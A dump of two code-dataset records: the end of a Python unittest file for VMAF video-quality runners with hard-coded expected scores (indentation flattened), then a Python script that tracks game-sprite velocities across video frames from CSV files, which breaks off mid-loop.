self.assertAlmostEqual(results[0]['BOOTSTRAP_VMAF_bagging_score'], 75.16984256068905, places=4)
self.assertAlmostEqual(results[1]['BOOTSTRAP_VMAF_bagging_score'], 99.9640738745435, places=4)
self.assertAlmostEqual(results[0]['BOOTSTRAP_VMAF_stddev_score'], 1.4162722210107226, places=4)
self.assertAlmostEqual(results[1]['BOOTSTRAP_VMAF_stddev_score'], 0.03321535846597722, places=4)
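
# Bagging runner: the predicted score effectively equals the bagging score.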
def test_run_bagging_vmaf_runner(self):
print 'test on running bagging VMAF runner...'
ref_path, dis_path, asset, asset_original = set_default_576_324_videos_for_testing()
self.runner = BaggingVmafQualityRunner(
[asset, asset_original],
None, fifo_mode=True,
delete_workdir=True,
result_store=None,
optional_dict={
'model_filepath': VmafConfig.test_resource_path('model', 'vmafplus_v0.5.2boot_test.pkl'),
},
)
self.runner.run()
results = self.runner.results
self.assertAlmostEqual(results[0]['VMAF_feature_vif_scale0_score'], 0.363420489439, places=4)
self.assertAlmostEqual(results[0]['VMAF_feature_vif_scale1_score'], 0.766647542135, places=4)
self.assertAlmostEqual(results[0]['VMAF_feature_vif_scale2_score'], 0.862854666902, places=4)
self.assertAlmostEqual(results[0]['VMAF_feature_vif_scale3_score'], 0.915971778036, places=4)
self.assertAlmostEqual(results[0]['VMAF_feature_motion2_score'], 3.8953518541666665, places=4)
self.assertAlmostEqual(results[0]['VMAF_feature_adm2_score'], 0.93458780728708746, places=4)
self.assertAlmostEqual(results[1]['VMAF_feature_vif_scale0_score'], 1.00000001415, places=4)
self.assertAlmostEqual(results[1]['VMAF_feature_vif_scale1_score'], 0.99999972612, places=4)
self.assertAlmostEqual(results[1]['VMAF_feature_vif_scale2_score'], 0.999999465724, places=4)
self.assertAlmostEqual(results[1]['VMAF_feature_vif_scale3_score'], 0.999999399683, places=4)
self.assertAlmostEqual(results[1]['VMAF_feature_motion2_score'], 3.8953518541666665, places=4)
self.assertAlmostEqual(results[1]['VMAF_feature_adm2_score'], 1.0, places=4)
with self.assertRaises(KeyError):
self.assertAlmostEqual(results[1]['VMAF_feature_vif_score'], 1.0, places=4)
with self.assertRaises(KeyError):
self.assertAlmostEqual(results[1]['VMAF_feature_ansnr_score'], 1.0, places=4)
with self.assertRaises(KeyError):
self.assertAlmostEqual(results[1]['VMAF_feature_motion_score'], 1.0, places=4)
self.assertAlmostEqual(results[0]['BOOTSTRAP_VMAF_score'], 75.130125465736413, places=4)
self.assertAlmostEqual(results[1]['BOOTSTRAP_VMAF_score'], 99.965048555775709, places=4)
self.assertAlmostEqual(results[0]['BOOTSTRAP_VMAF_bagging_score'], 75.13012623785923, places=4)
self.assertAlmostEqual(results[1]['BOOTSTRAP_VMAF_bagging_score'], 99.96504855577571, places=4)
self.assertAlmostEqual(results[0]['BOOTSTRAP_VMAF_stddev_score'], 0.6812993325967104, places=4)
self.assertAlmostEqual(results[1]['BOOTSTRAP_VMAF_stddev_score'], 0.03947607207290399, places=4)
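
# NIQE is no-reference, so inputs are NorefAsset objects with only a dis_path.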
def test_run_niqe_runner(self):
print 'test on running NIQE runner on images...'
ref1_path = VmafConfig.test_resource_path("test_image_yuv", "100007.yuv")
ref2_path = VmafConfig.test_resource_path("test_image_yuv", "100039.yuv")
asset1 = NorefAsset(dataset="test", content_id=0, asset_id=0,
workdir_root=VmafConfig.workdir_path(),
dis_path=ref1_path,
asset_dict={'width':481, 'height':321, 'yuv_type':'yuv444p'})
asset2 = NorefAsset(dataset="test", content_id=0, asset_id=1,
workdir_root=VmafConfig.workdir_path(),
dis_path=ref2_path,
asset_dict={'width':481, 'height':321, 'yuv_type':'yuv444p'})
self.runner = NiqeQualityRunner(
[asset1, asset2],
None, fifo_mode=True,
delete_workdir=True,
result_store=None
)
self.runner.run()
results = self.runner.results
self.assertAlmostEqual(results[0]['NIQE_score'], 4.8656072348129422, places=4)
self.assertAlmostEqual(results[1]['NIQE_score'], 2.9309929860778756, places=2)
class ParallelQualityRunnerTest(unittest.TestCase):
def setUp(self):
self.result_store = FileSystemResultStore()
def tearDown(self):
if hasattr(self, 'runner'):
self.runner.remove_results()
def test_run_parallel_vmaf_legacy_runner(self):
print 'test on running VMAF (legacy) quality runner in parallel...'
ref_path, dis_path, asset, asset_original = set_default_576_324_videos_for_testing()
self.runner = VmafLegacyQualityRunner(
[asset, asset_original, asset_original],
None, fifo_mode=True,
delete_workdir=True,
result_store=None
)
self.runner.run(parallelize=True)
results = self.runner.results
self.assertAlmostEqual(results[0]['VMAF_feature_vif_score'], 0.4460930625000001, places=4)
self.assertAlmostEqual(results[0]['VMAF_feature_motion_score'], 4.04982535417, places=4)
self.assertAlmostEqual(results[0]['VMAF_feature_adm_score'], 0.93458777083333333, places=4)
self.assertAlmostEqual(results[0]['VMAF_feature_ansnr_score'], 23.509571520833337, places=4)
self.assertAlmostEqual(results[1]['VMAF_feature_vif_score'], 1.0, places=4)
self.assertAlmostEqual(results[1]['VMAF_feature_motion_score'], 4.04982535417, places=4)
self.assertAlmostEqual(results[1]['VMAF_feature_adm_score'], 1.0, places=4)
self.assertAlmostEqual(results[1]['VMAF_feature_ansnr_score'], 31.271439270833337, places=4)
self.assertAlmostEqual(results[0]['VMAF_legacy_score'], 65.393758021816708, places=4)
self.assertAlmostEqual(results[1]['VMAF_legacy_score'], 96.444658329804156, places=4)
self.assertAlmostEqual(results[2]['VMAF_legacy_score'], 96.444658329804156, places=4)
def test_run_parallel_vmaf_runner(self):
print 'test on running VMAF quality runner in parallel...'
ref_path, dis_path, asset, asset_original = set_default_576_324_videos_for_testing()
self.runner = VmafQualityRunner(
[asset, asset_original, asset, asset_original],
None, fifo_mode=True,
delete_workdir=True,
result_store=None
)
self.runner.run(parallelize=True)
results = self.runner.results
self.assertAlmostEqual(results[0]['VMAF_feature_vif_scale0_score'], 0.363420489439, places=4)
self.assertAlmostEqual(results[0]['VMAF_feature_vif_scale1_score'], 0.766647542135, places=4)
self.assertAlmostEqual(results[0]['VMAF_feature_vif_scale2_score'], 0.862854666902, places=4)
self.assertAlmostEqual(results[0]['VMAF_feature_vif_scale3_score'], 0.915971778036, places=4)
self.assertAlmostEqual(results[0]['VMAF_feature_motion2_score'], 3.8953518541666665, places=4)
self.assertAlmostEqual(results[0]['VMAF_feature_adm2_score'], 0.93458777083333333, places=4)
self.assertAlmostEqual(results[1]['VMAF_feature_vif_scale0_score'], 1.00000001415, places=4)
self.assertAlmostEqual(results[1]['VMAF_feature_vif_scale1_score'], 0.99999972612, places=4)
self.assertAlmostEqual(results[1]['VMAF_feature_vif_scale2_score'], 0.999999465724, places=4)
self.assertAlmostEqual(results[1]['VMAF_feature_vif_scale3_score'], 0.999999399683, places=4)
self.assertAlmostEqual(results[1]['VMAF_feature_motion2_score'], 3.8953518541666665, places=4)
self.assertAlmostEqual(results[1]['VMAF_feature_adm2_score'], 1.0, places=4)
self.assertAlmostEqual(results[0]['VMAF_score'], 76.699271272486044, places=4)
self.assertAlmostEqual(results[1]['VMAF_score'], 99.946416604585025, places=4)
self.assertAlmostEqual(results[2]['VMAF_score'], 76.699271272486044, places=4)
self.assertAlmostEqual(results[3]['VMAF_score'], 99.946416604585025, places=4)
def test_run_parallel_psnr_runner(self):
print 'test on running PSNR quality runner in parallel...'
ref_path, dis_path, asset, asset_original = set_default_576_324_videos_for_testing()
self.runner = PsnrQualityRunner(
[asset, asset_original],
None, fifo_mode=True,
delete_workdir=True,
result_store=None
)
self.runner.run(parallelize=True)
results = self.runner.results
self.assertAlmostEqual(results[0]['PSNR_score'], 30.755063979166664, places=4)
self.assertAlmostEqual(results[1]['PSNR_score'], 60.0, places=4)
def test_run_parallel_vmaf_runner_with_rf_model(self):
print 'test on running VMAF quality runner in parallel with RF model...'
ref_path, dis_path, asset, asset_original = set_default_576_324_videos_for_testing()
self.runner = VmafQualityRunner(
[asset, asset_original, asset, asset, asset],
None, fifo_mode=True,
delete_workdir=True,
result_store=None,
optional_dict={
'model_filepath':VmafConfig.model_path("nflx_vmaff_rf_v2.pkl"),
},
optional_dict2=None,
)
self.runner.run(parallelize=True)
results = self.runner.results
self.assertAlmostEqual(results[0]['VMAF_feature_vif_score'], 0.4460930625, places=4)
self.assertAlmostEqual(results[0]['VMAF_feature_motion_score'], 4.04982535417, places=4)
self.assertAlmostEqual(results[0]['VMAF_feature_adm_score'], 0.93458777083333333, places=4)
self.assertAlmostEqual(results[0]['VMAF_feature_ansnr_score'], 23.5095715208, places=4)
self.assertAlmostEqual(results[1]['VMAF_feature_vif_score'], 1.0, places=4)
self.assertAlmostEqual(results[1]['VMAF_feature_motion_score'], 4.04982535417, places=4)
self.assertAlmostEqual(results[1]['VMAF_feature_adm_score'], 1.0, places=4)
self.assertAlmostEqual(results[1]['VMAF_feature_ansnr_score'], 31.2714392708, places=4)
self.assertAlmostEqual(results[0]['VMAF_score'], 79.224759615384599, places=4)
self.assertAlmostEqual(results[1]['VMAF_score'], 100.0, places=4)
self.assertAlmostEqual(results[2]['VMAF_score'], 79.224759615384599, places=4)
self.assertAlmostEqual(results[3]['VMAF_score'], 79.224759615384599, places=4)
self.assertAlmostEqual(results[4]['VMAF_score'], 79.224759615384599, places=4)
def test_run_parallel_ssim_runner(self):
print 'test on running SSIM quality runner in parallel...'
ref_path, dis_path, asset, asset_original = set_default_576_324_videos_for_testing()
self.runner = SsimQualityRunner(
[asset, asset_original, asset, asset],
None, fifo_mode=True,
delete_workdir=True,
result_store=None
)
self.runner.run(parallelize=True)
results = self.runner.results
self.assertAlmostEqual(results[0]['SSIM_score'], 0.86322654166666657, places=4)
self.assertAlmostEqual(results[0]['SSIM_feature_ssim_l_score'], 0.9981474583333334, places=4)
self.assertAlmostEqual(results[0]['SSIM_feature_ssim_c_score'], 0.96126793750000006, places=4)
self.assertAlmostEqual(results[0]['SSIM_feature_ssim_s_score'], 0.89773633333333336, places=4)
self.assertAlmostEqual(results[1]['SSIM_score'], 1.0, places=4)
self.assertAlmostEqual(results[1]['SSIM_feature_ssim_l_score'], 1.0, places=4)
self.assertAlmostEqual(results[1]['SSIM_feature_ssim_c_score'], 1.0, places=4)
self.assertAlmostEqual(results[1]['SSIM_feature_ssim_s_score'], 1.0, places=4)
self.assertAlmostEqual(results[2]['SSIM_score'], 0.86322654166666657, places=4)
self.assertAlmostEqual(results[3]['SSIM_score'], 0.86322654166666657, places=4)
def test_run_parallel_msssim_runner(self):
print 'test on running MS-SSIM quality runner in parallel...'
ref_path, dis_path, asset, asset_original = set_default_576_324_videos_for_testing()
self.runner = MsSsimQualityRunner(
[asset, asset_original, asset],
None, fifo_mode=True,
delete_workdir=True,
result_store=None
)
self.runner.run(parallelize=True)
results = self.runner.results
self.assertAlmostEqual(results[0]['MS_SSIM_score'], 0.9632498125, places=4)
self.assertAlmostEqual(results[0]['MS_SSIM_feature_ms_ssim_l_scale0_score'], 0.9981474583333334, places=4)
self.assertAlmostEqual(results[0]['MS_SSIM_feature_ms_ssim_c_scale0_score'], 0.96126793750000006, places=4)
self.assertAlmostEqual(results[0]['MS_SSIM_feature_ms_ssim_s_scale0_score'], 0.89773633333333336, places=4)
self.assertAlmostEqual(results[0]['MS_SSIM_feature_ms_ssim_l_scale1_score'], 0.99899612500000001, places=4)
self.assertAlmostEqual(results[0]['MS_SSIM_feature_ms_ssim_c_scale1_score'], 0.9857694375, places=4)
self.assertAlmostEqual(results[0]['MS_SSIM_feature_ms_ssim_s_scale1_score'], 0.941185875, places=4)
self.assertAlmostEqual(results[0]['MS_SSIM_feature_ms_ssim_l_scale2_score'], 0.99923564583333324, places=4)
self.assertAlmostEqual(results[0]['MS_SSIM_feature_ms_ssim_c_scale2_score'], 0.997034020833, places=4)
self.assertAlmostEqual(results[0]['MS_SSIM_feature_ms_ssim_s_scale2_score'], 0.977992145833, places=4)
self.assertAlmostEqual(results[0]['MS_SSIM_feature_ms_ssim_l_scale3_score'], 0.99929210416666658, places=4)
self.assertAlmostEqual(results[0]['MS_SSIM_feature_ms_ssim_c_scale3_score'], 0.999588104167, places=4)
self.assertAlmostEqual(results[0]['MS_SSIM_feature_ms_ssim_s_scale3_score'], 0.99387125, places=4)
self.assertAlmostEqual(results[0]['MS_SSIM_feature_ms_ssim_l_scale4_score'], 0.99940356249999995, places=4)
self.assertAlmostEqual(results[0]['MS_SSIM_feature_ms_ssim_c_scale4_score'], 0.999907625, places=4)
self.assertAlmostEqual(results[0]['MS_SSIM_feature_ms_ssim_s_scale4_score'], 0.998222583333, places=4)
self.assertAlmostEqual(results[1]['MS_SSIM_score'], 1.0, places=4)
self.assertAlmostEqual(results[1]['MS_SSIM_feature_ms_ssim_l_scale0_score'], 1., places=4)
self.assertAlmostEqual(results[1]['MS_SSIM_feature_ms_ssim_c_scale0_score'], 1., places=4)
self.assertAlmostEqual(results[1]['MS_SSIM_feature_ms_ssim_s_scale0_score'], 1., places=4)
self.assertAlmostEqual(results[1]['MS_SSIM_feature_ms_ssim_l_scale1_score'], 1., places=4)
self.assertAlmostEqual(results[1]['MS_SSIM_feature_ms_ssim_c_scale1_score'], 1., places=4)
self.assertAlmostEqual(results[1]['MS_SSIM_feature_ms_ssim_s_scale1_score'], 1., places=4)
self.assertAlmostEqual(results[1]['MS_SSIM_feature_ms_ssim_l_scale2_score'], 1., places=4)
self.assertAlmostEqual(results[1]['MS_SSIM_feature_ms_ssim_c_scale2_score'], 1., places=4)
self.assertAlmostEqual(results[1]['MS_SSIM_feature_ms_ssim_s_scale2_score'], 1., places=4)
self.assertAlmostEqual(results[1]['MS_SSIM_feature_ms_ssim_l_scale3_score'], 1., places=4)
self.assertAlmostEqual(results[1]['MS_SSIM_feature_ms_ssim_c_scale3_score'], 1., places=4)
self.assertAlmostEqual(results[1]['MS_SSIM_feature_ms_ssim_s_scale3_score'], 1., places=4)
self.assertAlmostEqual(results[1]['MS_SSIM_feature_ms_ssim_l_scale4_score'], 1., places=4)
self.assertAlmostEqual(results[1]['MS_SSIM_feature_ms_ssim_c_scale4_score'], 1., places=4)
self.assertAlmostEqual(results[1]['MS_SSIM_feature_ms_ssim_s_scale4_score'], 1., places=4)
self.assertAlmostEqual(results[2]['MS_SSIM_score'], 0.9632498125, places=4)
def test_run_parallel_msssim_runner_with_result_store(self):
print 'test on running MS-SSIM quality runner in parallel with result store...'
ref_path, dis_path, asset, asset_original = set_default_576_324_videos_for_testing()
self.runner = MsSsimQualityRunner(
[asset, asset_original, asset, asset],
None, fifo_mode=True,
delete_workdir=True,
result_store=self.result_store
)
self.runner.run(parallelize=True)
results = self.runner.results
self.assertAlmostEqual(results[0]['MS_SSIM_score'], 0.9632498125, places=4)
self.assertAlmostEqual(results[1]['MS_SSIM_score'], 1.0, places=4)
self.assertAlmostEqual(results[2]['MS_SSIM_score'], 0.9632498125, places=4)
self.assertAlmostEqual(results[3]['MS_SSIM_score'], 0.9632498125, places=4)
def test_run_parallel_runner_with_repeated_assets(self):
print 'test on running PSNR quality runner in parallel with repeated assets...'
ref_path, dis_path, asset, asset_original = set_default_576_324_videos_for_testing()
self.runner = PsnrQualityRunner(
[asset, asset_original, asset, asset],
None, fifo_mode=True,
delete_workdir=True,
result_store=self.result_store
)
self.runner.run(parallelize=True)
results = self.runner.results
self.assertAlmostEqual(results[0]['PSNR_score'], 30.755063979166664, places=4)
self.assertAlmostEqual(results[1]['PSNR_score'], 60.0, places=4)
self.assertAlmostEqual(results[2]['PSNR_score'], 30.755063979166664, places=4)
self.assertAlmostEqual(results[3]['PSNR_score'], 30.755063979166664, places=4)
def test_run_parallel_runner_with_parallel_disabled(self):
print 'test on running PSNR quality runner in parallel with parallelization disabled...'
ref_path, dis_path, asset, asset_original = set_default_576_324_videos_for_testing()
self.runner = PsnrQualityRunner(
[asset, asset_original, asset, asset],
None, fifo_mode=True,
delete_workdir=True,
result_store=None
)
self.runner.run(parallelize=False)
results = self.runner.results
self.assertAlmostEqual(results[0]['PSNR_score'], 30.755063979166664, places=4)
self.assertAlmostEqual(results[1]['PSNR_score'], 60.0, places=4)
self.assertAlmostEqual(results[2]['PSNR_score'], 30.755063979166664, places=4)
self.assertAlmostEqual(results[3]['PSNR_score'], 30.755063979166664, places=4)
def test_run_parallel_vmafossexec_runner_with_repeated_assets(self):
print 'test on running VMAFOSSEXEC quality runner in parallel with repeated assets...'
ref_path, dis_path, asset, asset_original = set_default_576_324_videos_for_testing()
self.runner = VmafossExecQualityRunner(
[asset, asset_original, asset, asset],
None, fifo_mode=True,
delete_workdir=True,
result_store=None
)
self.runner.run(parallelize=True)
results = self.runner.results
self.assertAlmostEqual(results[0]['VMAFOSSEXEC_score'], 76.699266666666674, places=3)
self.assertAlmostEqual(results[1]['VMAFOSSEXEC_score'], 99.946416666666664, places=4)
self.assertAlmostEqual(results[2]['VMAFOSSEXEC_score'], 76.699266666666674, places=3)
self.assertAlmostEqual(results[3]['VMAFOSSEXEC_score'], 76.699266666666674, places=3)
def test_run_parallel_niqe_runner(self):
print 'test on running NIQE runner in parallel...'
ref1_path = VmafConfig.test_resource_path("test_image_yuv", "100007.yuv")
ref2_path = VmafConfig.test_resource_path("test_image_yuv", "100039.yuv")
asset1 = NorefAsset(dataset="test", content_id=0, asset_id=0,
workdir_root=VmafConfig.workdir_path(),
dis_path=ref1_path,
asset_dict={'width':481, 'height':321, 'yuv_type':'yuv444p'})
asset2 = NorefAsset(dataset="test", content_id=0, asset_id=1,
workdir_root=VmafConfig.workdir_path(),
dis_path=ref2_path,
asset_dict={'width':481, 'height':321, 'yuv_type':'yuv444p'})
self.runner = NiqeQualityRunner(
[asset1, asset2],
None, fifo_mode=True,
delete_workdir=True,
result_store=None,
optional_dict={},
optional_dict2={},
)
self.runner.run(parallelize=True)
results = self.runner.results
self.assertAlmostEqual(results[0]['NIQE_score'], 4.8656072348129422, places=4)
self.assertAlmostEqual(results[1]['NIQE_score'], 2.9309929860778756, places=2)
class QualityRunnerVersionTest(unittest.TestCase):
def test_vmaf_quality_runner_version(self):
self.assertEqual(VmafQualityRunner.VERSION, 'F0.2.4c-0.6.1')
self.assertEqual(VmafQualityRunner.ALGO_VERSION, 2)
def test_vmafossexec_quality_runner_version(self):
self.assertEqual(VmafossExecQualityRunner.VERSION, 'F0.2.4c-0.6.1')
self.assertEqual(VmafossExecQualityRunner.ALGO_VERSION, 2)
class VmafossexecQualityRunnerSubsamplingTest(unittest.TestCase):
def tearDown(self):
if hasattr(self, 'runner0'):
self.runner0.remove_results()
if hasattr(self, 'runner'):
self.runner.remove_results()
def setUp(self):
self.result_store = FileSystemResultStore()
def test_run_vmafossexec_runner_with_subsample2(self):
print 'test on running VMAFOSSEXEC runner with subsample2...'
ref_path, dis_path, asset, asset_original = set_default_576_324_videos_for_testing()
subsample = 5
self.runner0 = VmafossExecQualityRunner(
[asset, asset_original],
None, fifo_mode=True,
delete_workdir=True,
result_store=None,
optional_dict={}
)
self.runner0.run()
results0 = self.runner0.results
self.runner = VmafossExecQualityRunner(
[asset, asset_original],
None, fifo_mode=True,
delete_workdir=True,
result_store=None,
optional_dict={'subsample': subsample}
)
self.runner.run()
results = self.runner.results
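# With subsampling, only every `subsample`-th frame is scored, so frame i of
# the full run maps to index i // subsample of the subsampled run.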
for i in range(48):
if i % subsample == 0:
self.assertAlmostEqual(results0[0]['VMAFOSSEXEC_scores'][i], results[0]['VMAFOSSEXEC_scores'][i // subsample], places=7)
self.assertAlmostEqual(results0[1]['VMAFOSSEXEC_scores'][i], results[1]['VMAFOSSEXEC_scores'][i // subsample], places=7)
if __name__ == '__main__':
unittest.main()
| 53.378544
| 135
| 0.692277
| 11,501
| 96,028
| 5.490392
| 0.036171
| 0.187236
| 0.248761
| 0.199097
| 0.950146
| 0.947771
| 0.93621
| 0.930636
| 0.902051
| 0.870869
| 0
| 0.11191
| 0.19285
| 96,028
| 1,798
| 136
| 53.408231
| 0.70277
| 0.001062
| 0
| 0.737805
| 0
| 0
| 0.204758
| 0.144241
| 0
| 0
| 0
| 0
| 0.395664
| 0
| null | null | 0.001355
| 0.00542
| null | null | 0.039295
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
0afd86b35326bc651bd014c5d7c5f29a93f0fc48
| 39
|
py
|
Python
|
pex-compile/test1.py
|
kodo-pp/pyke
|
3d216911819087b123126831fb702d2bb0cc240f
|
[
"Apache-2.0"
] | 1
|
2020-11-27T23:09:46.000Z
|
2020-11-27T23:09:46.000Z
|
pex-compile/test1.py
|
kodo-pp/pyke
|
3d216911819087b123126831fb702d2bb0cc240f
|
[
"Apache-2.0"
] | null | null | null |
pex-compile/test1.py
|
kodo-pp/pyke
|
3d216911819087b123126831fb702d2bb0cc240f
|
[
"Apache-2.0"
] | null | null | null |
def foo(a, b, c):
print(a + b + c)
| 13
| 20
| 0.435897
| 9
| 39
| 1.888889
| 0.666667
| 0.235294
| 0.352941
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.333333
| 39
| 2
| 21
| 19.5
| 0.653846
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| false
| 0
| 0
| 0
| 0.5
| 0.5
| 1
| 1
| 1
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
|
0
| 8
|
e400917d8ea2037d2085e6abe4a7bf55eb326de0
| 11,337
|
py
|
Python
|
findAccelerations.py
|
mguzdial3/VideoGameEngineLearning
|
4a849df7a5a53f97d604c47594fc34874bef2982
|
[
"MIT"
] | 5
|
2018-06-05T20:19:59.000Z
|
2020-06-04T06:53:03.000Z
|
findAccelerations.py
|
mguzdial3/VideoGameEngineLearning
|
4a849df7a5a53f97d604c47594fc34874bef2982
|
[
"MIT"
] | null | null | null |
findAccelerations.py
|
mguzdial3/VideoGameEngineLearning
|
4a849df7a5a53f97d604c47594fc34874bef2982
|
[
"MIT"
] | 3
|
2019-03-03T18:50:33.000Z
|
2020-01-17T00:36:46.000Z
|
import csv, shutil, sys, os, copy, glob
import random, math
import numpy as np
frameDirectory = "./frames5-25fpers/"
#Holds a reference to a single object detected in a frame
class FrameObject:
def __init__(self, name, positionX, positionY, width, height, velocityX, velocityY, confidence):
self.name = name
self.width = width
self.height = height
self.confidence = confidence
self.centerX = positionX
self.centerY = positionY
self.velocity = (velocityX,velocityY)
#Return the L1 distance between two objects: centroid, size, and velocity differences summed
def objectDistance(obj1, obj2):
return abs(obj1.centerX-obj2.centerX) + abs(obj1.centerY-obj2.centerY) + abs( (obj1.width)-(obj2.width) )+abs(obj1.height-obj2.height) + abs(obj1.velocity[0]-obj2.velocity[0]) + abs(obj1.velocity[1]-obj2.velocity[1])
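# Lower values mean a closer match; used below to greedily pair sprites
# across consecutive frames.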
#PLAYER SPRITE
source = open(frameDirectory+"marioChanges.csv","rb")
reader = csv.reader(source)
target = open("./frames5-25fpers/playerAccelerationTrack.csv", "wr")
writer = csv.writer(target)
rowOne = ["frame", "prevSprite", "thisSprite", "x", "y", "width", "height", "velocityX", "velocityY", "preVelocityX", "preVelocityY", "changeConfidence"]
writer.writerow(rowOne)
readIt = False
#Stores velocity for last frame
preVelocityX = 0
preVelocityY = 0
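# First pass: re-emit each player row with the previous frame's velocity
# appended, so accelerations can be derived by differencing downstream.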
for row in reader:
if readIt:
print str(row[0])
writer.writerow([row[0], str(row[1]), str(row[2]), str(row[3]), str(row[4]), str(row[5]), str(row[6]), str(row[7]), str(row[8]), str(preVelocityX), str(preVelocityY), str(row[9])])
preVelocityX = float(row[7])
preVelocityY = float(row[8])
readIt=True
target.close()
source.close()
#OTHER SPRITES
source = open("./frames5-25fpers/spriteChanges.csv","rb")
reader = csv.reader(source)
target = open("./frames5-25fpers/spriteAccelerationTrack.csv", "wr")
writer = csv.writer(target)
rowOne = ["frame", "prevSprite", "thisSprite", "x", "y", "width", "height", "velocityX", "velocityY", "preVelocityX", "preVelocityY", "changeConfidence"]
writer.writerow(rowOne)
readIt = False
#Stores the previous and current frame's objects
prevFrameObjects = []
thisFrameObjects = []
prevFrame = 0
thisFrame = 0
for row in reader:
if readIt:
currentFrame = int(row[0])
if not currentFrame==thisFrame and len(thisFrameObjects)>0:
print "Frame Print "+str(thisFrame)
if len(prevFrameObjects)>0 and thisFrame==(prevFrame+1):
#Set up for matching
thisFrameObjects = sorted(thisFrameObjects, key = lambda item: (item.centerX, item.centerY, item.width, item.height))
fromObjects = []
toObjects = []
#Determine which list we'll pull from, based on which frame has more objects
if len(thisFrameObjects)>=len(prevFrameObjects):
fromObjects = thisFrameObjects
toObjects = prevFrameObjects
else:
fromObjects = prevFrameObjects
toObjects = thisFrameObjects
maxLength = max(len(thisFrameObjects), len(prevFrameObjects))
fromPairs = fromObjects
toPairs = [None]*maxLength
toDists = [float("inf")]*maxLength
pairIndex = 0
threshold = 70
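# threshold is the largest objectDistance at which two objects are still
# considered the same sprite across consecutive frames.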
#Match each object in fromObjects to its nearest unused object in toObjects
for obj in fromObjects:
matchFound = False
cantUse = []
#Search until we find an unused object in toObjects to pair with this fromObjects entry
while not matchFound:
minObj = None
minDist = float("inf")
for toObj in toObjects:
thisDist = objectDistance(obj, toObj)
if thisDist<minDist and thisDist<threshold and not toObj in cantUse:
minObj=toObj
minDist = thisDist
if minObj == None:# We can't find any pair for this
toPairs[pairIndex] = None
pairIndex +=1 #Move to next pairIndex
matchFound = True
else: #We found a pair for this
if not minObj in toPairs: #If this isn't already in toPairs
toPairs[pairIndex] = minObj
toDists[pairIndex] = minDist
pairIndex +=1 #Move to next pairIndex
matchFound = True
else: #If this is already in toPairs
toPairIndex = toPairs.index(minObj)
if toDists[toPairIndex]<=minDist: #If its already used and toDists has a better match
cantUse.append(minObj)
else: #If it's already used but toDists has a worse match
#Set this value
toPairs[pairIndex] = minObj
toDists[pairIndex] = minDist
pairIndex +=1 #Move to next pairIndex
matchFound = True
#reset the old value
toPairs[toPairIndex] = None
toDists[toPairIndex] = float("inf")
#Find a new value (if we can)
if pairIndex<(len(toPairs)-1):
minObj = None
minDist = float("inf")
for index in range(pairIndex, len(toObjects)):
thisDist = objectDistance(fromObjects[toPairIndex], toObjects[index])
if thisDist<minDist and thisDist<threshold:
minObj=toObjects[index]
minDist = thisDist
toPairs[toPairIndex] = minObj
toDists[toPairIndex] = minDist
#Activate the pairs
currEndPair = None
prevEndPair = None
if len(thisFrameObjects)>=len(prevFrameObjects):
currEndPair = thisFrameObjects
prevEndPair = toPairs
else:
currEndPair = toPairs
prevEndPair = prevFrameObjects
#Write out all the pairs
for index in range(0, maxLength):
prevSprite = "None"
thisSprite = "None"
x = 0
y = 0
preX = 0
preY = 0
width = 0
height = 0
velocityX = 0
velocityY = 0
preVelocityX = 0
preVelocityY = 0
preConfidence = 1.0
thisConfidence = 1.0
changeConfidence = 0.0
if not currEndPair[index]==None:
currObj = currEndPair[index]
thisSprite = currObj.name
x = currObj.centerX
y = currObj.centerY
velocityX = currEndPair[index].velocity[0]
velocityY = currEndPair[index].velocity[1]
width = currObj.width
height = currObj.height
thisConfidence = currObj.confidence
if not prevEndPair[index]==None:
prevObj = prevEndPair[index]
prevSprite = prevObj.name
preX = prevObj.centerX
preY = prevObj.centerY
preVelocityX = prevEndPair[index].velocity[0]
preVelocityY = prevEndPair[index].velocity[1]
preConfidence = prevObj.confidence
if currEndPair[index] == None:
x = preX
y = preY
velocityX = preVelocityX
velocityY = preVelocityY
if prevEndPair[index] == None:
preX = x
preY = y
preVelocityX = velocityX
preVelocityY = velocityY
thisConfidence = currObj.confidence
changeConfidence = thisConfidence
writer.writerow([str(thisFrame), prevSprite, thisSprite, str(x), str(y), str(width), str(height), str(velocityX), str(velocityY), str(preVelocityX), str(preVelocityY), str(changeConfidence)])
else:
#No previous frame to match against; write rows with zero previous velocity
preVelocityX = 0
preVelocityY = 0
for fo in thisFrameObjects:
writer.writerow([str(thisFrame), "None", fo.name, str(fo.centerX), str(fo.centerY), str(fo.width), str(fo.height), str(fo.velocity[0]), str(fo.velocity[1]), str(preVelocityX), str(preVelocityY), str(fo.confidence)])
prevFrameObjects = thisFrameObjects
prevFrame = thisFrame
thisFrameObjects = []
thisFrameObjects.append(FrameObject(str(row[2]), float(row[3]), float(row[4]), float(row[5]), float(row[6]), float(row[7]), float(row[8]), float(row[9])))
thisFrame = currentFrame
readIt=True
#Set up for matching
thisFrameObjects = sorted(thisFrameObjects, key = lambda item: (item.centerX, item.centerY, item.width, item.height))
fromObjects = []
toObjects = []
#Determine which list we'll pull from, based on which frame has more objects
if len(thisFrameObjects)>=len(prevFrameObjects):
fromObjects = thisFrameObjects
toObjects = prevFrameObjects
else:
fromObjects = prevFrameObjects
toObjects = thisFrameObjects
maxLength = max(len(thisFrameObjects), len(prevFrameObjects))
fromPairs = fromObjects
toPairs = [None]*maxLength
toDists = [float("inf")]*maxLength
pairIndex = 0
threshold = 70
#Match each object in fromObjects to its nearest unused object in toObjects
for obj in fromObjects:
matchFound = False
cantUse = []
#Search until we find an unused object in toObjects to pair with this fromObjects entry
while not matchFound:
minObj = None
minDist = float("inf")
for toObj in toObjects:
thisDist = objectDistance(obj, toObj)
if thisDist<minDist and thisDist<threshold and not toObj in cantUse:
minObj=toObj
minDist = thisDist
if minObj == None:# We can't find any pair for this
toPairs[pairIndex] = None
pairIndex +=1 #Move to next pairIndex
